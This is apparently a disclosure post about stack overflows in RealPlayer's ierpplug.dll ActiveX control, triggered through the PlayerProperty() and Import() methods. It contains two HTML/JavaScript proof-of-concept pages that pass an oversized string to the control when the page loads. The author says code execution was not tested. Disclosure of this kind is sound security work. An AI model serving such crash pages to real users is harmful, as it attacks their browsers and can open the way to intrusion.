It appears that RealNetworks RealPlayer suffers from more stack overflow vulnerabilities in ierpplug.dll.
b3454ab95ff30b7f8777d5ed1fd582faa01978dbcdd22bde69db3e013481f88e
There are multiple stack overflows in the ierpplug.dll ActiveX Control. These issues were originally discovered by shinnai, http://www.securityfocus.com/bid/22811 and http://www.securityfocus.com/bid/21802. I am adding the Import() and PlayerProperty() functions to the list. This was tested on Windows XP SP2 fully patched, using IE 6; RealPlayer version 11, build 6.0.14.738, dist R41R01, ierpplug.dll version 1.0.1.3016. I have not tested code execution. PoC as follows:
------------
<!--
written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = "AAAA";
while (s.length < 999999) s=s+s;
var obj = new ActiveXObject("IERPCTL.IERPCTL"); //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}
obj.Import(s);
var obj2 = obj.PlayerProperty(s);
}
</script>
</head>
<body onload="JavaScript: return Check();">
</body>
</html>
------------
After some creative Googling, I am revising my original post. I believe that the Import() method overflow that I originally posted is really http://www.securityfocus.com/bid/26130, although I am not sure why Linux is listed under the "Vulnerable" section, so I am taking it out of the PoC code. Real claims to have patched this back in October, but I can still throw a stack overflow exception via this function using the originally stated version of RealPlayer(which I installed last night). I am now listing this vulnerability as RealNetworks RealPlayer ierpplug.dll ActiveX Control PlayerProperty() Method Stack Overflow, and it might be wise to list this under a separate BID. PoC as follows:
-------------
<!--
written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = "AAAA";
while (s.length < 999999) s=s+s;
var obj = new ActiveXObject("IERPCTL.IERPCTL"); //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}
var obj2 = obj.PlayerProperty(s);
}
</script>
</head>
<body onload="JavaScript: return Check();">
</body>
</html>
-------------
Elazar